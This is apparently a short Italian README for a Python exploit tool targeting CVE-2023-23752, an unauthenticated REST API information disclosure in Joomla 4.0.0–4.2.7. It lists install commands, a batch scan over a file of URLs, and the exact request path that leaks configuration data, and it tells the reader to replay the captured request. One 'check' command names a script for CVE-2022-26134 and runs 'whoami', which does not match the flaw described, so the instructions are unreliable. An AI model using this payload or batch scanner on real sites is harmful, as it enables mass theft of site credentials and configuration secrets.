
Exploit basato su Python per CVE-2023-23752 che ha come target Joomla 4.0.0-4.2.7, consentendo l'accesso non autorizzato all'API REST e la divulgazione di informazioni sensibili tramite payload appositamente creati.
CVE-2023-23752 - Riproduzione della vulnerabilità di accesso non autorizzato a Joomla
Installa le librerie python
pip install -r requirements.txt
Verifica della vulnerabilità
python3 CVE-2022-26134_check.py -u url -c whoami

Scansione batch
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Visitare l'URL della vulnerabilità, catturare il pacchetto e riprodurre il pacchetto dati

Joomla! CMS versione 4.0.0 - 4.2.7, a causa di una limitazione inadeguata dell'accesso agli endpoint dei servizi web, può consentire un accesso non autorizzato all'API REST, causando la divulgazione di informazioni sensibili.